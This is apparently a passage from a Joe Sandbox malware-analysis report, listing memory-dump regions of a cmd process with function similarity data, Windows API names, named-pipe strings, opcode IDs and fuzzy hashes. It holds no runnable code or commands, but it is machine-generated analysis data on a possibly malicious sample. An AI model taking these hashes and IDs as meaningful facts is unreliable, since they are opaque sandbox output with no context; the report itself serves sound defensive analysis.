        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
        • String ID: csm
        • API String ID: 2395640692-1018135373
        • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
        • Instruction ID: 84d3f1385e561940c4141ae4ca4361b5333ec0d6a84fc8d9647b0aefcff6a037
        • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
        • Instruction Fuzzy Hash: 4D51B036319728EADB54CB55F448F6837A1E364B88F145222EE495B7C8D7B8D8B1C700
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
        • String ID: csm
        • API String ID: 2395640692-1018135373
        • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
        • Instruction ID: edd84b322fcc53548a1b90fa386e2530886ffdac27580d0f1724ea4f5d982511
        • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
        • Instruction Fuzzy Hash: 8551B136319728EADB54CB95E448F6C3791E764B98F149222FE4E4B788DB78D8B1C700
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000003.2617452152.0000022123BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BF0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_3_22123bf0000_cmd.jbxd
        Similarity
        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
        • String ID: csm$csm
        • API String ID: 3896166516-3733052814
        • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
        • Instruction ID: ecb8a1998ec17816010c9a4883e086176838b77a220ce31af398d9fa5535443b
        • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
        • Instruction Fuzzy Hash: 5351B432100350E7EB78AFA1E148B5877A0F765B94F146215FE898BBD5CB3AD470CB01
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: CallEncodePointerTranslator
        • String ID: MOC$RCC
        • API String ID: 3544855599-2084237596
        • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
        • Instruction ID: c3bf87ba3a5575bb12758f9417ae8e2ec2dc3917a54eca3ed7fc37f06efb6e4e
        • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
        • Instruction Fuzzy Hash: EE61AD36504BD8D5EB218F56F444B9AB7A0F7A4B94F046316EF882BB95DB38C0E4CB00
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
        • String ID: csm$csm
        • API String ID: 3896166516-3733052814
        • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
        • Instruction ID: 64b5c46f5b4abba4ce74594b9690873672fab8e36332b5e7e69e667b783208a7
        • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
        • Instruction Fuzzy Hash: BD51B23A200298EBEB758F96A548B5877A0F360B84F146217EE496BBD1CB39D4F4C741
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000003.2617455752.0000022123BC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BC0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_3_22123bc0000_cmd.jbxd
        Similarity
        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
        • String ID: csm$csm
        • API String ID: 3896166516-3733052814
        • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
        • Instruction ID: 952c081ee1b476d36d3547288576f868cf3c03f3060175358613d0644edd1a02
        • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
        • Instruction Fuzzy Hash: BE519F322047A0EEEB74AF919148B58B7A0F365B94F144616FE998BBD5CB38D470CB01
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: CallEncodePointerTranslator
        • String ID: MOC$RCC
        • API String ID: 3544855599-2084237596
        • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
        • Instruction ID: 93ff9b2e65e03c3f6b5986c9975f4b9483ca2728426ada4187c31cb87cb210e2
        • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
        • Instruction Fuzzy Hash: 8E618C36508BC8D5EB209B56E444B9AB7A0F7A5B94F046216EF9C1BB95DF78C1F0CB00
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
        • String ID: csm$csm
        • API String ID: 3896166516-3733052814
        • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
        • Instruction ID: ab5bc46ec4431c5822e22b8002b3f66e9c3d5916e8164dee3660da2c20c47bd7
        • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
        • Instruction Fuzzy Hash: 97518F3A200768EBFB648B969548B5877A1F364B94F146217FE8D4BB95CF39C4B0CB01
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
        • String ID: pid_
        • API String ID: 517849248-4147670505
        • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
        • Instruction ID: e0add55bdf6be4a900d8fc8a7797fa86c835bdc6dcdc9eae78b11b51abf5549e
        • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
        • Instruction Fuzzy Hash: 8C11B4113107A5F1EB109BB5F80875A62A4F7A4780F906233BE499B7D4EF28D8B5C700
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
        • String ID: pid_
        • API String ID: 517849248-4147670505
        • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
        • Instruction ID: 7d4320477bb5c12188b1a442e9fb51ababa6b7014dac2ca7d1e71b12c2f78ce3
        • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
        • Instruction Fuzzy Hash: 0C1184113107A5F1EB509BA5E80979A62A4F764780F816237BE4D8B794EF68C9B5C700
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: FileWrite$ConsoleErrorLastOutput
        • String ID:
        • API String ID: 2718003287-0
        • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
        • Instruction ID: 697084b2fab90e2bac92c886e91424971910ab05c6eb16e3bf06d30d4f3ec410
        • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
        • Instruction Fuzzy Hash: 03D10232714A68DEE710CFA5D448AEC37B1F3A4798F405216EE4DABB99DB34D0A6D700
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: FileWrite$ConsoleErrorLastOutput
        • String ID:
        • API String ID: 2718003287-0
        • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
        • Instruction ID: 7205b9e72631fdb4bdf6d8509aad9c531c8d07a42593ae00387518af1bf25703
        • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
        • Instruction Fuzzy Hash: 52D1F332724AA8D9EB10CFA5D444ADC37B1F364B98F405217EE5D9BB99DA34C2A6C340
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: Heap$Process$Free
        • String ID:
        • API String ID: 3168794593-0
        • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
        • Instruction ID: d7594bb4565d799d65ddd7ab09a3cdd0e4b58bf08b3ba7bad3efd3aaefb35d2f
        • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
        • Instruction Fuzzy Hash: CA018032611BA4EAD714DFA6E80854977A0F798F80F155126EF4957714DF34E0B1CB40
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: Heap$Process$Free
        • String ID:
        • API String ID: 3168794593-0
        • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
        • Instruction ID: 1f7b6dd6e01acc1b9215a9942c48a269972714f0298cb5176af215c2fd217370
        • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
        • Instruction Fuzzy Hash: F0018C32610BA4EAE714DFA6E80898977A0F798F80F095126EF4D47728DF34D1B2C740
        APIs
        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000022123C628DF), ref: 0000022123C62A12
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: ConsoleMode
        • String ID:
        • API String ID: 4145635619-0
        • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
        • Instruction ID: d7f5b2d8e6ef7a61f10dcc9abbbc933d11c046a646b725f13f0aac5c01a4b697
        • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
        • Instruction Fuzzy Hash: DA91E932720668EDF7508FA59458BAD27A0F3E4B88F446207EE4A5B789DB34D4F5DB00
        APIs
        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000022123C328DF), ref: 0000022123C32A12
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: ConsoleMode
        • String ID:
        • API String ID: 4145635619-0
        • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
        • Instruction ID: 639451675f17ef9a898197e79de5fe4cde151b56477422f921c6fb538183b03e
        • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
        • Instruction Fuzzy Hash: 0091C4326206A8E5FF609FA5D458BAD37A0F364B88F446207EE4A5B689DB34C5F5C300
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
        • String ID:
        • API String ID: 2933794660-0
        • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
        • Instruction ID: 927e848bc2e69cfe0935aa371a63653be77f14f065caf6524894913166f1f1e6
        • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
        • Instruction Fuzzy Hash: 52112126714F14D9EB00CFA0E8587A933A4F769768F441E22EE6D867A4DF78D1B48740
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: FileType
        • String ID: \\.\pipe\
        • API String ID: 3081899298-91387939
        • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
        • Instruction ID: 4bb06d2f91ce54dc901096a0e1b3ce800e739fbe468f5c50ed116f406af258f8
        • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
        • Instruction Fuzzy Hash: 5B71C732210BA5E5E7359EA6A848BAA67D4F3A57C4F442217FD096BBCCDE34C5B1C700
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: FileType
        • String ID: \\.\pipe\
        • API String ID: 3081899298-91387939
        • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
        • Instruction ID: 258ab457b5195b0d56d8fd83489e1899b2c2958bbbc4e7002b0b5c8a50843e8a
        • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
        • Instruction Fuzzy Hash: CC71D736220B65E1E7B4DFA69948BEA6794F364B84F452217FD0D4BB48DE34C6B1C700
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000003.2617452152.0000022123BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BF0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_3_22123bf0000_cmd.jbxd
        Similarity
        • API ID: CurrentImageNonwritable__except_validate_context_record
        • String ID: csm
        • API String ID: 3242871069-1018135373
        • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
        • Instruction ID: c3538f3615203a82c887c8fe0d8d169f59347d72aeb5410cc167669b8027a8b7
        • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
        • Instruction Fuzzy Hash: B751AF32711A20EBDF64EF95E448F697391E364B88F255321FE4A8B788D77AD861C700
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000003.2617455752.0000022123BC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BC0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_3_22123bc0000_cmd.jbxd
        Similarity
        • API ID: CurrentImageNonwritable__except_validate_context_record
        • String ID: csm
        • API String ID: 3242871069-1018135373
        • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
        • Instruction ID: 4458924c8ec1f0da70bcf61281723291d13e3bb950849371b980187eca93797a
        • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
        • Instruction Fuzzy Hash: 6651BF32711A20EEDF74EF95E44CF693391E364B88F154A21EE4A8B788DB78C861C700
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000003.2617452152.0000022123BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BF0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_3_22123bf0000_cmd.jbxd
        Similarity
        • API ID: CallTranslator
        • String ID: MOC$RCC
        • API String ID: 3163161869-2084237596
        • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
        • Instruction ID: f8b0efb1a2bb081becdeb174f500325796c88955bc3f4a1dd555a5d6c4ab67fc
        • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
        • Instruction Fuzzy Hash: CF61C232504BD4D2DB30AF55E444B9AB7A0F7A9B88F145315FF980BB95CB79C0A0CB00
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000003.2617455752.0000022123BC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BC0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_3_22123bc0000_cmd.jbxd
        Similarity
        • API ID: CallTranslator
        • String ID: MOC$RCC
        • API String ID: 3163161869-2084237596
        • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
        • Instruction ID: 37270aef225f7ba92962e91457dd021cef62df64733816f0495d7bf1f8b57065
        • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
        • Instruction Fuzzy Hash: 1F61C232504BC4D9EB30AF55E444B9AB7A0F7A9B88F044715FF981BB95CB78C0A0CB00
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: FileType
        • String ID: \\.\pipe\
        • API String ID: 3081899298-91387939
        • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
        • Instruction ID: 5c376d35bbc68ea877755ba74bc9931794fe3b42fef3cfa41e167cbaf3944bb9
        • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
        • Instruction Fuzzy Hash: 0D5106262147A8E1E624CEA5F45CBAA67A1F3B47C0F051227ED496BBCDDE35C4B1C740
        APIs
